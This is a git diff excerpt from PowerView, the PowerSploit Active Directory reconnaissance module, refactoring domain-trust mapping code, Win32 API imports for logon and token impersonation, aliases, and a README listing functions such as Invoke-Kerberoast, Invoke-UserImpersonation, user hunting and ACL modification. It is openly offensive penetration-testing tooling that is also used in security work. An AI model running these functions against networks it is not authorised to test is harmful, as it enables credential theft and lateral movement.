+PowerView.DomainTrust.API
+
+Custom PSObject with translated domain API trust result fields.
 #>
-    [CmdletBinding()]
-    param(
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.DomainTrust.NET')]
+    [OutputType('PowerView.DomainTrust.LDAP')]
+    [OutputType('PowerView.DomainTrust.API')]
+    [CmdletBinding(DefaultParameterSetName = 'NET')]
+    Param(
+        [Parameter(ParameterSetName = 'API')]
+        [Switch]
+        $API,
+
+        [Parameter(ParameterSetName = 'LDAP')]
         [Switch]
         $LDAP,
 
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
+        [String]
+        $LDAPFilter,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [Parameter(ParameterSetName = 'API')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
 
-        [ValidateRange(1,10000)] 
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
+        [String]
+        $SearchScope = 'Subtree',
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ServerTimeLimit,
+
+        [Parameter(ParameterSetName = 'LDAP')]
+        [Switch]
+        $Tombstone,
 
+        [Parameter(ParameterSetName = 'LDAP')]
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
     # keep track of domains seen so we don't hit infinite recursion
@@ -13198,73 +18358,74 @@ function Invoke-MapDomainTrust {
     # our domain status tracker
     $Domains = New-Object System.Collections.Stack
 
+    $DomainTrustArguments = @{}
+    if ($PSBoundParameters['API']) { $DomainTrustArguments['API'] = $API }
+    if ($PSBoundParameters['LDAP']) { $DomainTrustArguments['LDAP'] = $LDAP }
+    if ($PSBoundParameters['LDAPFilter']) { $DomainTrustArguments['LDAPFilter'] = $LDAPFilter }
+    if ($PSBoundParameters['Properties']) { $DomainTrustArguments['Properties'] = $Properties }
+    if ($PSBoundParameters['SearchBase']) { $DomainTrustArguments['SearchBase'] = $SearchBase }
+    if ($PSBoundParameters['Server']) { $DomainTrustArguments['Server'] = $Server }
+    if ($PSBoundParameters['SearchScope']) { $DomainTrustArguments['SearchScope'] = $SearchScope }
+    if ($PSBoundParameters['ResultPageSize']) { $DomainTrustArguments['ResultPageSize'] = $ResultPageSize }
+    if ($PSBoundParameters['ServerTimeLimit']) { $DomainTrustArguments['ServerTimeLimit'] = $ServerTimeLimit }
+    if ($PSBoundParameters['Tombstone']) { $DomainTrustArguments['Tombstone'] = $Tombstone }
+    if ($PSBoundParameters['Credential']) { $DomainTrustArguments['Credential'] = $Credential }
+
     # get the current domain and push it onto the stack
-    $CurrentDomain = (Get-NetDomain -Credential $Credential).Name
-    $Domains.push($CurrentDomain)
+    if ($PSBoundParameters['Credential']) {
+        $CurrentDomain = (Get-Domain -Credential $Credential).Name
+    }
+    else {
+        $CurrentDomain = (Get-Domain).Name
+    }
+    $Domains.Push($CurrentDomain)
 
     while($Domains.Count -ne 0) {
 
         $Domain = $Domains.Pop()
 
         # if we haven't seen this domain before
-        if ($Domain -and ($Domain.Trim() -ne "") -and (-not $SeenDomains.ContainsKey($Domain))) {
-            
-            Write-Verbose "Enumerating trusts for domain '$Domain'"
+        if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) {
+
+            Write-Verbose "[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'"
 
             # mark it as seen in our list
-            $Null = $SeenDomains.add($Domain, "")
+            $Null = $SeenDomains.Add($Domain, '')
 
             try {
                 # get all the trusts for this domain
-                if($LDAP -or $DomainController) {
-                    $Trusts = Get-NetDomainTrust -Domain $Domain -LDAP -DomainController $DomainController -PageSize $PageSize -Credential $Credential
-                }
-                else {
-                    $Trusts = Get-NetDomainTrust -Domain $Domain -PageSize $PageSize -Credential $Credential
-                }
+                $DomainTrustArguments['Domain'] = $Domain
+                $Trusts = Get-DomainTrust @DomainTrustArguments
 
-                if($Trusts -isnot [System.Array]) {
+                if ($Trusts -isnot [System.Array]) {
                     $Trusts = @($Trusts)
                 }
 
                 # get any forest trusts, if they exist
-                if(-not ($LDAP -or $DomainController) ) {
-                    $Trusts += Get-NetForestTrust -Forest $Domain -Credential $Credential
+                if ($PsCmdlet.ParameterSetName -eq 'LDAP') {
+                    $ForestTrustArguments = @{}
+                    if ($PSBoundParameters['Forest']) { $ForestTrustArguments['Forest'] = $Forest }
+                    if ($PSBoundParameters['Credential']) { $ForestTrustArguments['Credential'] = $Credential }
+                    $Trusts += Get-ForestTrust @ForestTrustArguments
                 }
 
                 if ($Trusts) {
-                    if($Trusts -isnot [System.Array]) {
+                    if ($Trusts -isnot [System.Array]) {
                         $Trusts = @($Trusts)
                     }
 
                     # enumerate each trust found
                     ForEach ($Trust in $Trusts) {
-                        if($Trust.SourceName -and $Trust.TargetName) {
-                            $SourceDomain = $Trust.SourceName
-                            $TargetDomain = $Trust.TargetName
-                            $TrustType = $Trust.TrustType
-                            $TrustDirection = $Trust.TrustDirection
-                            $ObjectType = $Trust.PSObject.TypeNames | Where-Object {$_ -match 'PowerView'} | Select-Object -First 1
-
+                        if ($Trust.SourceName -and $Trust.TargetName) {
                             # make sure we process the target
-                            $Null = $Domains.Push($TargetDomain)
-
-                            # build the nicely-parsable custom output object
-                            $DomainTrust = New-Object PSObject
-                            $DomainTrust | Add-Member Noteproperty 'SourceDomain' "$SourceDomain"
-                            $DomainTrust | Add-Member Noteproperty 'SourceSID' $Trust.SourceSID
-                            $DomainTrust | Add-Member Noteproperty 'TargetDomain' "$TargetDomain"
-                            $DomainTrust | Add-Member Noteproperty 'TargetSID' $Trust.TargetSID
-                            $DomainTrust | Add-Member Noteproperty 'TrustType' "$TrustType"
-                            $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$TrustDirection"
-                            $DomainTrust.PSObject.TypeNames.Add($ObjectType)
-                            $DomainTrust
+                            $Null = $Domains.Push($Trust.TargetName)
+                            $Trust
                         }
                     }
                 }
             }
             catch {
-                Write-Verbose "[!] Error: $_"
+                Write-Verbose "[Get-DomainTrustMapping] Error: $_"
             }
         }
     }
@@ -13274,33 +18435,15 @@ function Invoke-MapDomainTrust {
 ########################################################
 #
 # Expose the Win32API functions and datastructures below
-# using PSReflect. 
-# Warning: Once these are executed, they are baked in 
+# using PSReflect.
+# Warning: Once these are executed, they are baked in
 # and can't be changed while the script is running!
 #
 ########################################################
 
 $Mod = New-InMemoryModule -ModuleName Win32
 
-# all of the Win32 API functions we need
-$FunctionDefinitions = @(
-    (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
-    (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
-    (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
-    (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
-    (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())),
-    (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())),
-    (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])),
-    (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),
-    (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError),
-    (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])),
-    (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])),
-    (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
-    (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
-    (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])),
-    (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])),
-    (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr]))
-)
+# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', Scope='Function', Target='psenum')]
 
 # enum used by $WTS_SESSION_INFO_1 below
 $WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{
@@ -13317,7 +18460,7 @@ $WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{
 }
 
 # the WTSEnumerateSessionsEx result structure
-$WTS_SESSION_INFO_1 = struct $Mod WTS_SESSION_INFO_1 @{
+$WTS_SESSION_INFO_1 = struct $Mod PowerView.RDPSessionInfo @{
     ExecEnvId = field 0 UInt32
     State = field 1 $WTSConnectState
     SessionId = field 2 UInt32
@@ -13335,26 +18478,26 @@ $WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{
 }
 
 # the NetShareEnum result structure
-$SHARE_INFO_1 = struct $Mod SHARE_INFO_1 @{
-    shi1_netname = field 0 String -MarshalAs @('LPWStr')
-    shi1_type = field 1 UInt32
-    shi1_remark = field 2 String -MarshalAs @('LPWStr')
+$SHARE_INFO_1 = struct $Mod PowerView.ShareInfo @{
+    Name = field 0 String -MarshalAs @('LPWStr')
+    Type = field 1 UInt32
+    Remark = field 2 String -MarshalAs @('LPWStr')
 }
 
 # the NetWkstaUserEnum result structure
-$WKSTA_USER_INFO_1 = struct $Mod WKSTA_USER_INFO_1 @{
-    wkui1_username = field 0 String -MarshalAs @('LPWStr')
-    wkui1_logon_domain = field 1 String -MarshalAs @('LPWStr')
-    wkui1_oth_domains = field 2 String -MarshalAs @('LPWStr')
-    wkui1_logon_server = field 3 String -MarshalAs @('LPWStr')
+$WKSTA_USER_INFO_1 = struct $Mod PowerView.LoggedOnUserInfo @{
+    UserName = field 0 String -MarshalAs @('LPWStr')
+    LogonDomain = field 1 String -MarshalAs @('LPWStr')
+    AuthDomains = field 2 String -MarshalAs @('LPWStr')
+    LogonServer = field 3 String -MarshalAs @('LPWStr')
 }
 
 # the NetSessionEnum result structure
-$SESSION_INFO_10 = struct $Mod SESSION_INFO_10 @{
-    sesi10_cname = field 0 String -MarshalAs @('LPWStr')
-    sesi10_username = field 1 String -MarshalAs @('LPWStr')
-    sesi10_time = field 2 UInt32
-    sesi10_idle_time = field 3 UInt32
+$SESSION_INFO_10 = struct $Mod PowerView.SessionInfo @{
+    CName = field 0 String -MarshalAs @('LPWStr')
+    UserName = field 1 String -MarshalAs @('LPWStr')
+    Time = field 2 UInt32
+    IdleTime = field 3 UInt32
 }
 
 # enum used by $LOCALGROUP_MEMBERS_INFO_2 below
@@ -13370,6 +18513,12 @@ $SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{
     SidTypeComputer         = 9
 }
 
+# the NetLocalGroupEnum result structure
+$LOCALGROUP_INFO_1 = struct $Mod LOCALGROUP_INFO_1 @{
+    lgrpi1_name = field 0 String -MarshalAs @('LPWStr')
+    lgrpi1_comment = field 1 String -MarshalAs @('LPWStr')
+}
+
 # the NetLocalGroupGetMembers result structure
 $LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{
     lgrmi2_sid = field 0 IntPtr
@@ -13414,7 +18563,101 @@ $DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{
     DomainGuid = field 7 Guid
 }
 
+# used by WNetAddConnection2W
+$NETRESOURCEW = struct $Mod NETRESOURCEW @{
+    dwScope =         field 0 UInt32
+    dwType =          field 1 UInt32
+    dwDisplayType =   field 2 UInt32
+    dwUsage =         field 3 UInt32
+    lpLocalName =     field 4 String -MarshalAs @('LPWStr')
+    lpRemoteName =    field 5 String -MarshalAs @('LPWStr')
+    lpComment =       field 6 String -MarshalAs @('LPWStr')
+    lpProvider =      field 7 String -MarshalAs @('LPWStr')
+}
+
+# all of the Win32 API functions we need
+$FunctionDefinitions = @(
+    (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+    (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+    (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+    (func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+    (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+    (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())),
+    (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())),
+    (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])),
+    (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),
+    (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError),
+    (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])),
+    (func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError),
+    (func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError),
+    (func advapi32 RevertToSelf ([Bool]) @() -SetLastError),
+    (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])),
+    (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
+    (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
+    (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])),
+    (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])),
+    (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])),
+    (func Mpr WNetAddConnection2W ([Int]) @($NETRESOURCEW, [String], [String], [UInt32])),
+    (func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])),
+    (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError)
+)
+
 $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
 $Netapi32 = $Types['netapi32']
 $Advapi32 = $Types['advapi32']
 $Wtsapi32 = $Types['wtsapi32']
+$Mpr = $Types['Mpr']
+$Kernel32 = $Types['kernel32']
+
+Set-Alias Get-IPAddress Resolve-IPAddress
+Set-Alias Convert-NameToSid ConvertTo-SID
+Set-Alias Convert-SidToName ConvertFrom-SID
+Set-Alias Request-SPNTicket Get-DomainSPNTicket
+Set-Alias Get-DNSZone Get-DomainDNSZone
+Set-Alias Get-DNSRecord Get-DomainDNSRecord
+Set-Alias Get-NetDomain Get-Domain
+Set-Alias Get-NetDomainController Get-DomainController
+Set-Alias Get-NetForest Get-Forest
+Set-Alias Get-NetForestDomain Get-ForestDomain
+Set-Alias Get-NetForestCatalog Get-ForestGlobalCatalog
+Set-Alias Get-NetUser Get-DomainUser
+Set-Alias Get-UserEvent Get-DomainUserEvent
+Set-Alias Get-NetComputer Get-DomainComputer
+Set-Alias Get-ADObject Get-DomainObject
+Set-Alias Set-ADObject Set-DomainObject
+Set-Alias Get-ObjectAcl Get-DomainObjectAcl
+Set-Alias Add-ObjectAcl Add-DomainObjectAcl
+Set-Alias Invoke-ACLScanner Find-InterestingDomainAcl
+Set-Alias Get-GUIDMap Get-DomainGUIDMap
+Set-Alias Get-NetOU Get-DomainOU
+Set-Alias Get-NetSite Get-DomainSite
+Set-Alias Get-NetSubnet Get-DomainSubnet
+Set-Alias Get-NetGroup Get-DomainGroup
+Set-Alias Find-ManagedSecurityGroups Get-DomainManagedSecurityGroup
+Set-Alias Get-NetGroupMember Get-DomainGroupMember
+Set-Alias Get-NetFileServer Get-DomainFileServer
+Set-Alias Get-DFSshare Get-DomainDFSShare
+Set-Alias Get-NetGPO Get-DomainGPO
+Set-Alias Get-NetGPOGroup Get-DomainGPOLocalGroup
+Set-Alias Find-GPOLocation Get-DomainGPOUserLocalGroupMapping
+Set-Alias Find-GPOComputerAdmin Get-DomainGPOComputerLocalGroupMappin
+Set-Alias Get-LoggedOnLocal Get-RegLoggedOn
+Set-Alias Invoke-CheckLocalAdminAccess Test-AdminAccess
+Set-Alias Get-SiteName Get-NetComputerSiteName
+Set-Alias Get-Proxy Get-WMIRegProxy
+Set-Alias Get-LastLoggedOn Get-WMIRegLastLoggedOn
+Set-Alias Get-CachedRDPConnection Get-WMIRegCachedRDPConnection
+Set-Alias Get-RegistryMountedDrive Get-WMIRegMountedDrive
+Set-Alias Get-NetProcess Get-WMIProcess
+Set-Alias Invoke-ThreadedFunction New-ThreadedFunction
+Set-Alias Invoke-UserHunter Find-DomainUserLocation
+Set-Alias Invoke-ProcessHunter Find-DomainProcess
+Set-Alias Invoke-EventHunter Find-DomainUserEvent
+Set-Alias Invoke-ShareFinder Find-DomainShare
+Set-Alias Invoke-FileFinder Find-InterestingDomainShareFile
+Set-Alias Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember
+Set-Alias Get-NetDomainTrust Get-DomainTrust
+Set-Alias Get-NetForestTrust Get-ForestTrust
+Set-Alias Find-ForeignUser Get-DomainForeignUser
+Set-Alias Find-ForeignGroup Get-DomainForeignGroupMember
+Set-Alias Invoke-MapDomainTrust Get-DomainTrustMapping
diff --git a/Recon/README.md b/Recon/README.md
index 6e28a30..7fcacc5 100644
--- a/Recon/README.md
+++ b/Recon/README.md
@@ -34,96 +34,93 @@ an array of hosts from the pipeline.
 

 ### Misc Functions:

     Export-PowerViewCSV             -   thread-safe CSV append

-    Set-MacAttribute                -   Sets MAC attributes for a file based on another file or input (from Powersploit)

-    Copy-ClonedFile                 -   copies a local file to a remote location, matching MAC properties

-    Get-IPAddress                   -   resolves a hostname to an IP

-    Test-Server                     -   tests connectivity to a specified server

-    Convert-NameToSid               -   converts a given user/group name to a security identifier (SID)

-    Convert-SidToName               -   converts a security identifier (SID) to a group/user name

-    Convert-NT4toCanonical          -   converts a user/group NT4 name (i.e. dev/john) to canonical format

-    Get-Proxy                       -   enumerates local proxy settings

+    Resolve-IPAddress               -   resolves a hostname to an IP

+    ConvertTo-SID                   -   converts a given user/group name to a security identifier (SID)

+    Convert-ADName                  -   converts object names between a variety of formats

+    ConvertFrom-UACValue            -   converts a UAC int value to human readable form

+    Add-RemoteConnection            -   pseudo "mounts" a connection to a remote path using the specified credential object

+    Remove-RemoteConnection         -   destroys a connection created by New-RemoteConnection

+    Invoke-UserImpersonation        -   creates a new "runas /netonly" type logon and impersonates the token

+    Invoke-RevertToSelf             -   reverts any token impersonation

+    Get-DomainSPNTicket             -   request the kerberos ticket for a specified service principal name (SPN)

+    Invoke-Kerberoast               -   requests service tickets for kerberoast-able accounts and returns extracted ticket hashes

     Get-PathAcl                     -   get the ACLs for a local/remote file path with optional group recursion

-    Get-UserProperty                -   returns all properties specified for users, or a set of user:prop names

-    Get-ComputerProperty            -   returns all properties specified for computers, or a set of computer:prop names

-    Find-InterestingFile            -   search a local or remote path for files with specific terms in the name

-    Invoke-CheckLocalAdminAccess    -   check if the current user context has local administrator access to a specified host

-    Get-DomainSearcher              -   builds a proper ADSI searcher object for a given domain

-    Get-ObjectAcl                   -   returns the ACLs associated with a specific active directory object

-    Add-ObjectAcl                   -   adds an ACL to a specified active directory object

-    Get-LastLoggedOn                -   return the last logged on user for a target host

-    Get-CachedRDPConnection 		-	queries all saved RDP connection entries on a target host

-    Invoke-ACLScanner               -   enumerate -1000+ modifable ACLs on a specified domain

-    Get-GUIDMap                     -   returns a hash table of current GUIDs -> display names

-    Get-DomainSID                   -   return the SID for the specified domain

-    Invoke-ThreadedFunction         -   helper that wraps threaded invocation for other functions

-

-

-### net * Functions:

-    Get-NetDomain                   -   gets the name of the current user's domain

-    Get-NetForest                   -   gets the forest associated with the current user's domain

-    Get-NetForestDomain             -   gets all domains for the current forest

-    Get-NetDomainController         -   gets the domain controllers for the current computer's domain

-    Get-NetUser                     -   returns all user objects, or the user specified (wildcard specifiable)

-    Add-NetUser                     -   adds a local or domain user

-    Get-NetComputer                 -   gets a list of all current servers in the domain

-    Get-NetPrinter                  -   gets an array of all current computers objects in a domain

-    Get-NetOU                       -   gets data for domain organization units

-    Get-NetSite                     -   gets current sites in a domain

-    Get-NetSubnet                   -   gets registered subnets for a domain

-    Get-NetGroup                    -   gets a list of all current groups in a domain

-    Get-NetGroupMember              -   gets a list of all current users in a specified domain group

-    Get-NetLocalGroup               -   gets the members of a localgroup on a remote host or hosts

-    Add-NetGroupUser                -   adds a local or domain user to a local or domain group

-    Get-NetFileServer               -   get a list of file servers used by current domain users

-    Get-DFSshare                    -   gets a list of all distribute file system shares on a domain

-    Get-NetShare                    -   gets share information for a specified server

-    Get-NetLoggedon                 -   gets users actively logged onto a specified server

-    Get-NetSession                  -   gets active sessions on a specified server

-    Get-NetRDPSession               -   gets active RDP sessions for a specified server (like qwinsta)

-    Get-NetProcess                  -   gets the remote processes and owners on a remote server

-    Get-UserEvent                   -   returns logon or TGT events from the event log for a specified host

-    Get-ADObject                    -   takes a domain SID and returns the user, group, or computer 

-                                        object associated with it

-    Set-ADObject                    -   takes a SID, name, or SamAccountName to query for a specified

-                                        domain object, and then sets a specified 'PropertyName' to a

-                                        specified 'PropertyValue'

+

+

+### Domain/LDAP Functions:

+    Get-DomainDNSZone               -   enumerates the Active Directory DNS zones for a given domain

+    Get-DomainDNSRecord             -   enumerates the Active Directory DNS records for a given zone

+    Get-Domain                      -   returns the domain object for the current (or specified) domain

+    Get-DomainController            -   return the domain controllers for the current (or specified) domain

+    Get-Forest                      -   returns the forest object for the current (or specified) forest

+    Get-ForestDomain                -   return all domains for the current (or specified) forest

+    Get-ForestGlobalCatalog         -   return all global catalogs for the current (or specified) forest

+    Find-DomainObjectPropertyOutlier-   inds user/group/computer objects in AD that have 'outlier' properties set

+    Get-DomainUser                  -   return all users or specific user objects in AD

+    New-DomainUser                  -   creates a new domain user (assuming appropriate permissions) and returns the user object

+    Set-DomainUserPassword          -   sets the password for a given user identity and returns the user object

+    Get-DomainUserEvent             -   enumerates account logon events (ID 4624) and Logon with explicit credential events

+    Get-DomainComputer              -   returns all computers or specific computer objects in AD

+    Get-DomainObject                -   returns all (or specified) domain objects in AD

+    Set-DomainObject                -   modifies a gven property for a specified active directory object

+    Get-DomainObjectAcl             -   returns the ACLs associated with a specific active directory object

+    Add-DomainObjectAcl             -   adds an ACL for a specific active directory object

+    Find-InterestingDomainAcl       -   finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects

+    Get-DomainOU                    -   search for all organization units (OUs) or specific OU objects in AD

+    Get-DomainSite                  -   search for all sites or specific site objects in AD

+    Get-DomainSubnet                -   search for all subnets or specific subnets objects in AD

+    Get-DomainSID                   -   returns the SID for the current domain or the specified domain

+    Get-DomainGroup                 -   return all groups or specific group objects in AD

+    New-DomainGroup                 -   creates a new domain group (assuming appropriate permissions) and returns the group object

+    Get-DomainManagedSecurityGroup  -   returns all security groups in the current (or target) domain that have a manager set

+    Get-DomainGroupMember           -   return the members of a specific domain group

+    Add-DomainGroupMember           -   adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so

+    Get-DomainFileServer            -   returns a list of servers likely functioning as file servers

+    Get-DomainDFSShare              -   returns a list of all fault-tolerant distributed file systems for the current (or specified) domain

 

    

 ### GPO functions

-    Get-GptTmpl                     -   parses a GptTmpl.inf to a custom object

-    Get-NetGPO                      -   gets all current GPOs for a given domain

-    Get-NetGPOGroup                 -   gets all GPOs in a domain that set "Restricted Groups" 

-                                        on on target machines

-    Find-GPOLocation                -   takes a user/group and makes machines they have effective

-                                        rights over through GPO enumeration and correlation

-    Find-GPOComputerAdmin           -   takes a computer and determines who has admin rights over it

-                                        through GPO enumeration

-    Get-DomainPolicy                -   returns the default domain or DC policy

 

+    Get-DomainGPO                           -   returns all GPOs or specific GPO objects in AD

+    Get-DomainGPOLocalGroup                 -   returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences

+    Get-DomainGPOUserLocalGroupMapping      -   enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation

+    Get-DomainGPOComputerLocalGroupMapping  -   takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation

+    Get-DomainPolicy                        -   returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller

 

-### User-Hunting Functions:

-    Invoke-UserHunter               -   finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines

-    Invoke-StealthUserHunter        -   finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users

-    Invoke-ProcessHunter            -   hunts for processes with a specific name or owned by a specific user on domain machines

-    Invoke-UserEventHunter          -   hunts for user logon events in domain controller event logs

 

+### Computer Enumeration Functions

+

+    Get-NetLocalGroup                   -   enumerates the local groups on the local (or remote) machine

+    Get-NetLocalGroupMember             -   enumerates members of a specific local group on the local (or remote) machine

+    Get-NetShare                        -   returns open shares on the local (or a remote) machine

+    Get-NetLoggedon                     -   returns users logged on the local (or a remote) machine

+    Get-NetSession                      -   returns session information for the local (or a remote) machine

+    Get-RegLoggedOn                     -   returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys

+    Get-NetRDPSession                   -   returns remote desktop/session information for the local (or a remote) machine

+    Test-AdminAccess                    -   rests if the current user has administrative access to the local (or a remote) machine

+    Get-NetComputerSiteName             -   returns the AD site where the local (or a remote) machine resides

+    Get-WMIRegProxy                     -   enumerates the proxy server and WPAD conents for the current user

+    Get-WMIRegLastLoggedOn              -   returns the last user who logged onto the local (or a remote) machine

+    Get-WMIRegCachedRDPConnection       -   returns information about RDP connections outgoing from the local (or remote) machine

+    Get-WMIRegMountedDrive              -   returns information about saved network mounted drives for the local (or remote) machine

+    Get-WMIProcess                      -   returns a list of processes and their owners on the local or remote machine

+    Find-InterestingFile                -   searches for files on the given path that match a series of specified criteria

 

-### Domain Trust Functions:

-    Get-NetDomainTrust              -   gets all trusts for the current user's domain

-    Get-NetForestTrust              -   gets all trusts for the forest associated with the current user's domain

-    Find-ForeignUser                -   enumerates users who are in groups outside of their principal domain

-    Find-ForeignGroup               -   enumerates all the members of a domain's groups and finds users that are outside of the queried domain

-    Invoke-MapDomainTrust           -   try to build a relational mapping of all domain trusts

-

-

-### MetaFunctions:

-    Invoke-ShareFinder              -   finds (non-standard) shares on hosts in the local domain

-    Invoke-FileFinder               -   finds potentially sensitive files on hosts in the local domain

-    Find-LocalAdminAccess           -   finds machines on the domain that the current user has local admin access to

-    Find-ManagedSecurityGroups      -   searches for active directory security groups which are managed and identify users who have write access to

-                                    -   those groups (i.e. the ability to add or remove members)

-    Find-UserField                  -   searches a user field for a particular term

-    Find-ComputerField              -   searches a computer field for a particular term

-    Get-ExploitableSystem           -   finds systems likely vulnerable to common exploits

-    Invoke-EnumerateLocalAdmin      -   enumerates members of the local Administrators groups across all machines in the domain

 

+### Threaded 'Meta'-Functions

+

+    Find-DomainUserLocation             -   finds domain machines where specific users are logged into

+    Find-DomainProcess                  -   finds domain machines where specific processes are currently running

+    Find-DomainUserEvent                -   finds logon events on the current (or remote domain) for the specified users

+    Find-DomainShare                    -   finds reachable shares on domain machines

+    Find-InterestingDomainShareFile     -   searches for files matching specific criteria on readable shares in the domain

+    Find-LocalAdminAccess               -   finds machines on the local domain where the current user has local administrator access

+    Find-DomainLocalGroupMember         -   enumerates the members of specified local group on machines in the domain

+

+

+### Domain Trust Functions:

+    Get-DomainTrust                     -   returns all domain trusts for the current domain or a specified domain

+    Get-ForestTrust                     -   returns all forest trusts for the current forest or a specified forest

+    Get-DomainForeignUser               -   enumerates users who are in groups outside of the user's domain

+    Get-DomainForeignGroupMember        -   enumerates groups with users outside of the group's domain and returns each foreign member

+    Get-DomainTrustMapping              -   this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds

diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1
